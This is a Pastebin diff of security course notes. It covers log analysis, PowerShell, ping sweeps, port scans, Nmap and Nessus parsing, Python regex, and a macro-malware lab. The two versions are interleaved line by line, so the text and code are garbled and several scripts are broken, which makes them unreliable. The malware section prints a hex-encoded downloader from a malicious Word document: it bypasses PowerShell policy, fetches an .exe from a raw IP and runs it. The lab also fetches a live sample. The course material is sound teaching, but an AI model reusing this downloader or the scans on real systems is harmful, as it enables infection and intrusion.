View difference between Paste ID: <a href="/YpfzJnfU">YpfzJnfU</a> and <a href="/1mE4i7Hy">1mE4i7Hy</a> - Pastebin.com

View difference between Paste ID: YpfzJnfU and 1mE4i7Hy

SHOW: | | - or go back to the newest paste.

#######################
# VMs for this course #
#######################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
	username: workshop
	password: password
	
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts

You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).

You'll need to create directory in the Win7 VM called "c:\ps"

In this file you will also need to change the text '149.28.201.171' to the IP address of your Ubuntu host.
In this file you will also need to change the text '192.168.200.144' to the IP address of your Ubuntu host.




If you are interested in running PowerShell on Mac OS X, or Linux you can check out the following link:

https://www.howtogeek.com/267858/how-to-install-microsoft-powershell-on-linux-or-os-x/

# Log Analysis with Linux command-line tools #
##############################################
The following command line executables are found in the Mac as well as most Linux Distributions.

cat –  prints the content of a file in the terminal window
PowerShell is Microsoft's new scripting language that has been built in since the release Vista. 
grep – searches and filters based on patterns
awk –  can sort each row into fields and display only what is needed
sed –  performs find and replace functions
sort – arranges output in an order
uniq – compares adjacent lines and can report, filter or provide a count of duplicates


##############
------------------------Type This------------------------------
# Cisco Logs #
##############

wget https://s3.amazonaws.com/infosecaddictsfiles/cisco.log

---------------------------------------------------------------

AWK Basics
----------
To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
------------------------Type This------------------------------

cat cisco.log | awk '{print $5}' | tail -n 4
--------------------------------------------------------------- 




------------------------Type This------------------------------
Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.

---------------------------------------------------------------
cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn



------------------------Type This------------------------------

While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.

---------------------------------------------------------------
cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn


------------------------Type This------------------------------



Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.

cat cisco.log | grep %LINEPROTO-5-UPDOWN:

cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
---------------------------------------------------------------

cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn

cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn



------------------------Type This------------------------------

#########
---------------------------------------------------------------
# EGrep #
#########


- PowerShell variables begin with the $ symbol. First lets create a variable

------------------------Type This------------------------------


---------------------------------------------------------------

# Powershell Basics #
#####################
------------------------Type This------------------------------

PowerShell is Microsoft’s new scripting language that has been built in since the release Vista. 

PowerShell file extension end in .ps1 . 
---------------------------------------------------------------

An important note is that you cannot double click on a PowerShell script to execute it. 

To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
------------------------Type This------------------------------

dir 
cd 
ls
---------------------------------------------------------------



To obtain a list of cmdlets, use the Get-Command cmdlet

Let's use a method and a property with our object. 

------------------------Type This------------------------------



You can use the Get-Alias cmdlet to see a full list of aliased commands.

Get-Alias


---------------------------------------------------------------

Don't worry you won't blow up your machine with Powershell
Get-Process | stop-process 				Don't press [ ENTER ] What will this command do?
If you want some good command-line shortcuts you can check out the following link:

https://technet.microsoft.com/en-us/library/ff678293.aspx


To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.

Get-Help Get-Command
Let's setup a directory to work in:

------------------------Type This------------------------------


Get-Service -Name TermService, Spooler
mkdir ps

Get-Service –N BITS
cd ps

---------------------------------------------------------------


PowerShell variables begin with the $ symbol. First lets create a variable

$serv = Get-Service –N Spooler

To see the value of a variable you can just call it in the terminal.

------------------------Type This------------------------------


$serv.gettype().fullname
 

Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
---------------------------------------------------------------

$serv | Get-Member

Get-Member -InputObject $serv
------------------------Type This------------------------------

 
---------------------------------------------------------------



Let’s use a method and a property with our object. 

$serv.Status
$serv.Stop()
$serv.Refresh()
$serv.Status
$serv.Start()
$serv.Refresh()
$serv.Status
------------------------Type This------------------------------




---------------------------------------------------------------
Methods can return properties and properties can have sub properties. You can chain them together by appending them to the first call.


------------------------Type This------------------------------


---------------------------------------------------------------


- Run cmdlet through a pie and refer to its properties as $_
Get-Service | where-object {  $_.Status -eq "Running"}


Variables
---------

vs1 = 1
vs1.GetType().Name


------------------------Type This------------------------------
vs1 = "string "
vs1.GetType().Name
---------------------------------------------------------------



- Get a listing of variables
------------------------Type This------------------------------
Get-variable
Get-ChildItem variable


---------------------------------------------------------------

For Loops
---------
1..5 | ForEach-Object   { $Sum = 0 } { $Sum += $_ }


------------------------Type This------------------------------


---------------------------------------------------------------
$Numbers = 4..7
1..1 | forecach-object { if ($Numbers -contains $_)
{ continue }; $_ }
------------------------Type This------------------------------


---------------------------------------------------------------


foreach ($i in (1..10)){
	if ($i -gt 5){
------------------------Type This------------------------------
		continue
	}
---------------------------------------------------------------
	$i
)






PSDrives
--------

To get a list of current PSDrives that are available on a system we use Get-PSDrive cmdlet

------------------------Type This------------------------------
To get a list of the Providers the current sessions has available with the modules it has loaded the Get-PSProvider cmdlet is used.

The default PSDrives created when a Shell Session is started are:

- Alias - Represent all aliases valid for the current PowerShell session.
---------------------------------------------------------------

- Cert - Certificate store for the user represented in Current Location.

- Env - All environment variables for the current PowerShell Session

------------------------Type This------------------------------
- Function - All functions available for the current PowerShell

---------------------------------------------------------------
- HKLM - Registry HKey Local Machine registry hive

- HKCU - Registry HKCU Current user hive

- WSMan - WinRM (Windows Remote Management) configuration and credentials
------------------------Type This------------------------------


---------------------------------------------------------------


Playing with WMI
----------------
------------------------Type This------------------------------

Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
# List all namespaces in the default root/cimv2
---------------------------------------------------------------
Get-WmiObject -Class __namespace | Select-Object Name


# List all namespaces under root/microsoft
------------------------Type This------------------------------
Get-WmiObject -Class __namespace -Namespace root/microsoft | Select-Object Name
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique

---------------------------------------------------------------
# To list classes under the default namespace
Get-WmiObject -List *

# To filter classes with the word network in their name
------------------------Type This------------------------------
Get-WmiObject -List *network*
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des

---------------------------------------------------------------

# To list classes in another namespace 
Get-WmiObject -List * -Namespace root/microsoft/homenet


# To get a description of a class
(Get-WmiObject -list win32_service -Amended).qualifiers | Select-Object name, value | ft -AutoSize -Wrap



------------------------Type This------------------------------

PowerShell treats WMI objects the same as .Net Objects so we can use Select-Object, Where-Object, ForEach-Object and Formatting cmdlets like we do with any other .Net object type.

In the case of WMI with Get-WMIObject we also have the ability to use filters based on WQL Operators with the -Filter parameter
---------------------------------------------------------------

$wmishare = [wmiclass] "win32_process"
$wmishare.Methods


Invoke-WMIMethod -class Win32_Process -Name create -ArgumentList 'calc.exe'
------------------------Type This------------------------------


---------------------------------------------------------------






Get-PSProvider Registry

- To list sub-keys of a registry path
Get-childItem -Path hkcu:\

- To copy a key and all sub-keys
Copy-Item -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion' -Destination hkcu: -Recurse

- To create a key
New-Item -Path HKCU:\_DeleteMe

- To Remove keys
Remove-Item -Path HKCU:\_DeleteMe
Remove-Item -Path HKCU:\CurrentVersion


Regex Characters you might run into:


^	Start of string, or start of line in a multiline pattern
- Selecting Objects
$	End  of string, or start of line in a multiline pattern
- Selecting specific Objects from a list
\b	Word boundary
Get-Process | Sort-Object workingset -D
\d	Digit

\	Escape the following character
$str = "my string"
*	0 or more	{3}	Exactly 3
$str.contains("                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ")
+	1 or more	{3,}	3 or more

?	0 or 1		{3,5}	3, 4 or 5
- Selecting a range of objects from a list
Get-Process | Sort-Object workingset -Descending | Select-Object -Index (0..4)

- Creating/Renaming a property
Get-Process | Select-Object -Property name,@{name = 'PID'; expression = {$_.id}}


------------------------Type This------------------------------
Get-Process | Sort-Object workingset -Descending | Select-Object -Index 0,1,2,3,4  

#############################
# Simple Event Log Analysis #
---------------------------------------------------------------


Step 1: Dump the event logs
---------------------------
The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists. 

To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs. 
If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.

------------------------Type This------------------------------

$input_path = 'c:\ps\emails.txt'

$output_file = 'c:\ps\extracted_addresses.txt'

$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'

$logs = "system","application","security"
---------------------------------------------------------------

The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console

$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }





Step 2: Import the event log of interest
----------------------------------------
To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files. 
Store the results in a variable. 
1) "-Path" which takes as input the full path to the input file


2) "-Pattern" which takes as input the regular expression used in the matching process


3) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.


Using ">" the results are written to the destination specified in the $output_file variable.



Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:

Get-EventLog Application -After (Get-Date).AddDays(-1)

------------------------Type This------------------------------

$input_path = 'c:\ps\ip_addresses.txt'

$output_file = 'c:\ps\extracted_ip_addresses.txt'

$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'


---------------------------------------------------------------



Step 3: Drill into a specific entry
-----------------------------------
To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties. 


------------------------Type This------------------------------

$input_path = 'c:\ps\URL_addresses.txt'

$output_file = 'c:\ps\extracted_URL_addresses.txt'

$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'


---------------------------------------------------------------


(($seclog | select -first 1).message).gettype()
All you need to do is switch the regular expression in the "$regex" variable! 



In the *nix world you often want a count of something (wc -l). 
How often is the SeSecurityPrivilege privilege mentioned in the message property? 
To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:

$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
########################################

# Basic Network Commands in PowerShell #

########################################


Reference:

https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/

Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present. 
Use the count property to determine the total number of entries in the event log.

# Pentester Tasks #


Reference:

http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx



Listing IPs

-----------

One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one

############################
------------------------Type This------------------------------

$octect = "149.28.201."

$lastoctect = (1..255)

$lastoctect | ForEach-Object {write-host "$($octect)$($_)"}

---------------------------------------------------------------

mkdir c:\ps
cd c:\ps
Ping Sweep


PowerShell provides several methods for doing Ping

Test-Connection cmdlet

Creation of a WMI Object

.Net System.Net.NetworkInformation.Ping Object

	
	

------------------------Type This------------------------------
###############################################
function New-IPRange ($start, $end) {
# Intrusion Analysis Using Windows PowerShell #
$ip1 = ([System.Net.IPAddress]$start).GetAddressBytes()
###############################################
[Array]::Reverse($ip1)

$ip1 = ([System.Net.IPAddress]($ip1 -join '.')).Address
Download sample file http://pastebin.com/raw.php?i=ysnhXxTV into the c:\ps directory

$ip2 = ([System.Net.IPAddress]$end).GetAddressBytes()

[Array]::Reverse($ip2)

$ip2 = ([System.Net.IPAddress]($ip2 -join '.')).Address


for ($x=$ip1; $x -le $ip2; $x++) {

$ip = ([System.Net.IPAddress]$x).GetAddressBytes()

[Array]::Reverse($ip)

$ip -join '.'

}

}

$ping = New-Object System.Net.NetworkInformation.Ping

New-IPRange 149.28.201.1 149.28.201.250 | ForEach-Object {$ping.Send($_, 100)} | where {$_.status -eq "Success"}

---------------------------------------------------------------

Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line

Reverse Lookups

---------------

For reverse lookups using .Net Class we use the [System.Net.Dns]::GetHostEntry(IP) method Returns System.Net.IPHostEntry

To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.

------Deprecated--------

[System.Net.Dns]::GetHostByAddress("162.243.126.247")   

------Deprecated--------


Use getnameinfo instead:

https://msdn.microsoft.com/en-us/library/windows/desktop/ms738532(v=vs.85).aspx

Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
References:

https://stackoverflow.com/questions/10346194/how-to-use-getnameinfo-instead-of-gethostbyname


Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses. 

Forward Lookups
Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
---------------


------------------------Type This------------------------------

[System.Net.Dns]::GetHostAddresses("www.google.com")

---------------------------------------------------------------

Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des

Port Scans


To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library

For TCP the .Net System.Net.Sockets.TcpClient
This will get the setting for logs in the windows firewall which should be enabled in GPO policy for analysis. 
For UDP the .Net System.Net.Sockets.UdpClient
The command shows that the Firewall log is at:
%systemroot%\system32\LogFiles\Firewall\pfirewall.log, in order to open the file PowerShell will need to be run with administrative privileges.


First step is to get the above command into a variable using script logic.
TCP Scan (Windows 7)
Thankfully PowerShell has a built-in integrated scripting environment, PowerShell.ise. 
--------------------

NOTE: If you are using Windows 7, use the code below
netsh advfirewall show allprofiles | Select-String FileName | select -ExpandProperty line | Select-String “%systemroot%.+\.log" | select -ExpandProperty matches | select -ExpandProperty value | sort –uniq
------------------------Type This------------------------------

$ports=22,80,443,3389

$target = "149.28.201.171"

foreach ($i in $ports) {

try {

$socket = new-object System.Net.Sockets.TCPClient($target, $i);

} catch {}

if ($socket -eq $NULL) {

echo "$target:$i - Closed";

} else {

echo "$target:$i - Open";

$socket = $NULL;

}}

---------------------------------------------------------------


The above command would give us all the WebDAV requests.

TCP Scan (Windows 10)

---------------------

NOTE: If you are using Windows 10, use the code below


------------------------Type This------------------------------

$ports=22,80,443,3389

$target = "149.28.201.171"

foreach ($i in $ports) {

try {

$socket = new-object System.Net.Sockets.TCPClient($target, $i);

} catch {}

if ($socket -eq $NULL) {

echo "${target}:$i - Closed";

} else {

echo "${target}:$i - Open";

$socket = $NULL;

}}

---------------------------------------------------------------



####################################################################
##########################

# Parsing Nmap XML Files #

##########################

If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:

https://s3.amazonaws.com/infosecaddictsfiles/PowerShell-Files.zip


(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
Let's setup a directory to work in:

------------------------Type This------------------------------


2) The regular expression that the input file will be compared against
mkdir ps

3) The output file for where the extracted data will be placed.
cd ps

---------------------------------------------------------------
Windows PowerShell has a “select-string” cmdlet which can be used to quickly scan a file to see if a certain string value exists. 
Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.

To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.

------------------------Type This------------------------------
$input_path = ‘c:\ps\emails.txt’
$output_file = ‘c:\ps\extracted_addresses.txt’
mkdir PowerShell-Files
$regex = ‘\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b’
cd PowerShell-Files

(new-object System.Net.WebClient).DownloadFile("https://s3.amazonaws.com/infosecaddictsfiles/PowerShell/Parse-Nmap.ps1", "c:\ps\PowerShell-Files\Parse-Nmap.ps1")

(new-object System.Net.WebClient).DownloadFile("https://s3.amazonaws.com/infosecaddictsfiles/PowerShell/class_nessus.csv", "c:\ps\PowerShell-Files\class_nessus.csv")

(new-object System.Net.WebClient).DownloadFile("https://s3.amazonaws.com/infosecaddictsfiles/PowerShell/samplescan.xml", "c:\ps\PowerShell-Files\samplescan.xml")

---------------------------------------------------------------


2) $output_file to hold the path to the file we want the results to be stored in
Run Powershell as administrator

------------------------Type This------------------------------

cd C:\ps\\PowerShell-Files

The select-string cmdlet contains various parameters as follows:
Get-ExecutionPolicy

Set-ExecutionPolicy Unrestricted –Force
1) “-Path” which takes as input the full path to the input file
---------------------------------------------------------------

2) “-Pattern” which takes as input the regular expression used in the matching process

Parse nmap XML
3) “-AllMatches” which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to “$.Matches” and then “$_.Value” which represent using the current values of all the matches.
------------------------Type This------------------------------

.\parse-nmap.ps1 samplescan.xml
Using “>” the results are written to the destination specified in the $output_file variable.
---------------------------------------------------------------

Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.

Process all XML files

------------------------Type This------------------------------

.\parse-nmap.ps1 *.xml

---------------------------------------------------------------

$input_path = ‘c:\ps\ip_addresses.txt’
Piping also works
$output_file = ‘c:\ps\extracted_ip_addresses.txt’
------------------------Type This------------------------------
$regex = ‘\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b’
dir *.xml | .\parse-nmap.ps1

---------------------------------------------------------------


Advanced parsing with filtering conditions

------------------------Type This------------------------------

.\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS

---------------------------------------------------------------


$input_path = ‘c:\ps\URL_addresses.txt’
More parsing
$output_file = ‘c:\ps\extracted_URL_addresses.txt’
------------------------Type This------------------------------
$regex = ‘([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?’
.\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}

---------------------------------------------------------------


Parsing with match and multiple conditions

------------------------Type This------------------------------
All you need to do is switch the regular expression in the “$regex” variable! 
.\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"}

---------------------------------------------------------------


###################
CSV Export
# Regex in Python #
------------------------Type This------------------------------

.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv

---------------------------------------------------------------


Import Data from CSV

------------------------Type This------------------------------
**************************************************
$data = import-csv weblisteners.csv
* What is Regular Expression and how is it used? *
$data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
**************************************************
---------------------------------------------------------------


Simply put, regular expression is a sequence of character(s) mainly used to find and replace patterns in a string or file. 
Export to HTML

------------------------Type This------------------------------

.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html
Regular expressions use two types of characters:
---------------------------------------------------------------

a) Meta characters: As the name suggests, these characters have a special meaning, similar to * in wildcard.

########################################
b) Literals (like a,b,1,2…)
# Parsing Nessus scans with PowerShell #

########################################

If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
In Python, we have module "re" that helps with regular expressions. So you need to import library re before you can use regular expressions in Python.
https://s3.amazonaws.com/infosecaddictsfiles/PowerShell-Files.zip


Use this code --> import re

Let's take a look at the Import-Csv cmdlet and what are the members of the object it returns:

------------------------Type This------------------------------

Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | Get-Member

---------------------------------------------------------------
The most common uses of regular expressions are:
--------------------------------------------------
filter the objects:

- Search a string (search and match)
------------------------Type This------------------------------
- Finding a string (findall)
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"}
- Break string into a sub strings (split)
---------------------------------------------------------------
- Replace part of a string (sub)

use the Select-Object cmdlet and only get unique entries:

------------------------Type This------------------------------

Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique
Let's look at the methods that library "re" provides to perform these tasks.

Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView

------------------------Type This------------------------------

****************************************************
ConvertTo-Html cmdlet and turn it in to an HTML report in list format:
* What are various methods of Regular Expressions? *
------------------------Type This------------------------------
****************************************************
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html

---------------------------------------------------------------

The ‘re' package provides multiple methods to perform queries on an input string. Here are the most commonly used methods, I will discuss:

re.match()
re.search()
#####################################################
re.findall()
# Analyzing Macro Embedded Malware                  #
re.split()
# Reference:                                        #
re.sub()
# https://jon.glass/analyzes-dridex-malware-p1/     #
re.compile()
#####################################################

Let's look at them one by one.
Use the InfoSec Addicts virtual machine:

 
re.match(pattern, string):
-------------------------------------------------

This method finds match if it occurs at start of the string. For example, calling match() on the string ‘AV Analytics AV' and looking for a pattern ‘AV' will match. However, if we look for only Analytics, the pattern will not match. Let's perform it in python now.
------------------------Type This------------------------------

sudo pip install olefile
Code
     infosecaddicts

import re
mkdir ~/Desktop/oledump
result = re.match(r'AV', 'AV Analytics ESET AV')
print result
cd ~/Desktop/oledump

Output:
wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
<_sre.SRE_Match object at 0x0000000009BE4370>

unzip oledump_V0_0_22.zip
Above, it shows that pattern match has been found. To print the matching string we'll use method group (It helps to return the matching string). Use "r" at the start of the pattern string, it designates a python raw string.

wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip

result = re.match(r'AV', 'AV Analytics ESET AV')
unzip 064016.zip
print result.group(0)
     infected

Output:
python oledump.py 064016.doc
AV

python oledump.py 064016.doc -s A4 -v

---------------------------------------------------------------
Let's now find ‘Analytics' in the given string. Here we see that string is not starting with ‘AV' so it should return no match. Let's see what we get:

- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.

- Three of the data streams are flagged as macros: A3:'VBA/Module1′, A4:'VBA/Module2′, A5:'VBA/ThisDocument'.
Code

------------------------Type This------------------------------
result = re.match(r'Analytics', 'AV Analytics ESET AV')
python oledump.py 064016.doc -s A5 -v
print result 
---------------------------------------------------------------


- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
Output: 
None
------------------------Type This------------------------------

python oledump.py 064016.doc -s A3 -v

---------------------------------------------------------------
There are methods like start() and end() to know the start and end position of matching pattern in the string.

- Look for "GVhkjbjv" and you should see:
Code

636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
result = re.match(r'AV', 'AV Analytics ESET AV')
print result.start()
- Take that long blob that starts with 636D and finishes with 653B and paste it in:
print result.end()
http://www.rapidtables.com/convert/number/hex-to-ascii.htm

Output:
0
2

Above you can see that start and end position of matching pattern ‘AV' in the string and sometime it helps a lot while performing manipulation with the string.


############################################

# Introduction to scripting and toolmaking #

############################################

https://www.youtube.com/watch?v=usiqXcWb978
re.search(pattern, string):
-----------------------------------------------------
Start the ISE


It is similar to match() but it doesn't restrict us to find matches at the beginning of the string only. Unlike previous method, here searching for pattern ‘Analytics' will return a match.
CTRL+R

Code

result = re.search(r'Analytics', 'AV Analytics ESET AV')
print result.group(0)

Output:
Analytics

Get-EventLog -LogName application
Here you can see that, search() method is able to find a pattern from any position of the string but it only returns the first occurrence of the search pattern.


------------------------------------------------------------------------------------------------

--- Now run the script ---


.\GrabLogs.ps1

re.findall (pattern, string):
------------------------------------------------------
------------------------------------------------------------------------------------------------


It helps to get a list of all matching patterns. It has no constraints of searching from start or end. If we will use method findall to search ‘AV' in given string it will return both occurrence of AV. While searching a string, I would recommend you to use re.findall() always, it can work like re.search() and re.match() both.

$LogName="application"

Get-EventLog -LogName $LogName | Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
Code

result = re.findall(r'AV', 'AV Analytics ESET AV')
print result

--- Now run the script ---
Output:
['AV', 'AV']
.\GrabLogs.ps1



------------------------------------------------------------------------------------------------


re.split(pattern, string, [maxsplit=0]):
param(

    $LogName="application"


Get-EventLog -LogName $LogName | Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml

This methods helps to split string by the occurrences of given pattern.


--- Now run the script ---
Code

.\GrabLogs.ps1
result=re.split(r'y','Analytics')
result

------------------------------------------------------------------------------------------------
Output:
--- Now run the script ---
['Anal', 'tics']

.\GrabLogs.ps1 -L[ TAB Key ]
Above, we have split the string "Analytics" by "y". Method split() has another argument "maxsplit". It has default value of zero. In this case it does the maximum splits that can be done, but if we give value to maxsplit, it will split the string. Let's look at the example below:

.\GrabLogs.ps1 -LogName 		(you should now see LogName spelled out)

Code

.\GrabLogs.ps1 -LogName system
result=re.split(r's','Analytics eset')
print result

------------------------------------------------------------------------------------------------
Output:
['Analytic', 'e', 'et'] #It has performed all the splits that can be done by pattern "s".

Code
param(

    $LogName="application",
result=re.split(r's','Analytics eset',maxsplit=1)
    $FACTS
result

Get-EventLog -LogName $LogName | Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
Output:
['Analytic', 'eset']

Here, you can notice that we have fixed the maxsplit to 1. And the result is, it has only two values whereas first example has three values.
------------------------------------------------------------------------------------------------

--- Now run the script ---


.\GrabLogs.ps1 -H[ TAB Key ]

re.sub(pattern, repl, string):
.\GrabLogs.ps1 -FACTS 		(you should now see FACTS spelled out)
----------------------------------------------------------

It helps to search a pattern and replace with a new sub string. If the pattern is not found, string is returned unchanged.

Code
------------------------------------------------------------------------------------------------

--- Now get help on the script ---
result=re.sub(r'Ruby','Python','Joe likes Ruby')
result
get-help .\GrabLogs.ps1
Output:
GrabLogs.ps1 [[-LogName] <Object>] [[-FACTS] <Object>]
'Joe likes Python'




------------------------------------------------------------------------------------------------

param(
re.compile(pattern, repl, string):
    [string]$LogName="application",
----------------------------------------------------------
    $FACTS


Get-EventLog -LogName $LogName | Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
We can combine a regular expression pattern into pattern objects, which can be used for pattern matching. It also helps to search a pattern again without rewriting it.


Code
------------------------------------------------------------------------------------------------

--- Now get help on the script ---
import re
pattern=re.compile('XSS')
get-help .\GrabLogs.ps1
result=pattern.findall('XSS is Cross Site Sripting, XSS')
GrabLogs.ps1 [[-LogName] <String>] [[-FACTS] <Object>]
print result
result2=pattern.findall('XSS is Cross Site Scripting, SQLi is Sql Injection')
print result2
Output:
['XSS', 'XSS']
------------------------------------------------------------------------------------------------
['XSS']
param(

    [string[]]$LogName="application",
Till now,  we looked at various methods of regular expression using a constant pattern (fixed characters). But, what if we do not have a constant search pattern and we want to return specific set of characters (defined by a rule) from a string?  Don't be intimidated.
    $FACTS

This can easily be solved by defining an expression with the help of pattern operators (meta  and literal characters). Let's look at the most common pattern operators.
Get-EventLog -LogName $LogName | Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml

 


------------------------------------------------------------------------------------------------

--- Now get help on the script ---
**********************************************
* What are the most commonly used operators? *
get-help .\GrabLogs.ps1
**********************************************
GrabLogs.ps1 [[-LogName] <String[]>] [[-FACTS] <Object>]


Regular expressions can specify patterns, not just fixed characters. Here are the most commonly used operators that helps to generate an expression to represent required characters in a string or file. It is commonly used in web scrapping and  text mining to extract required information.

------------------------------------------------------------------------------------------------
Operators	Description
[CmdletBinding()]
.	        Matches with any single character except newline ‘\n'.
param(
?	        match 0 or 1 occurrence of the pattern to its left
    [Parameter(Mandatory=$True)]
+	        1 or more occurrences of the pattern to its left
    $LogName
*	        0 or more occurrences of the pattern to its left
\w	        Matches with a alphanumeric character whereas \W (upper case W) matches non alphanumeric character.
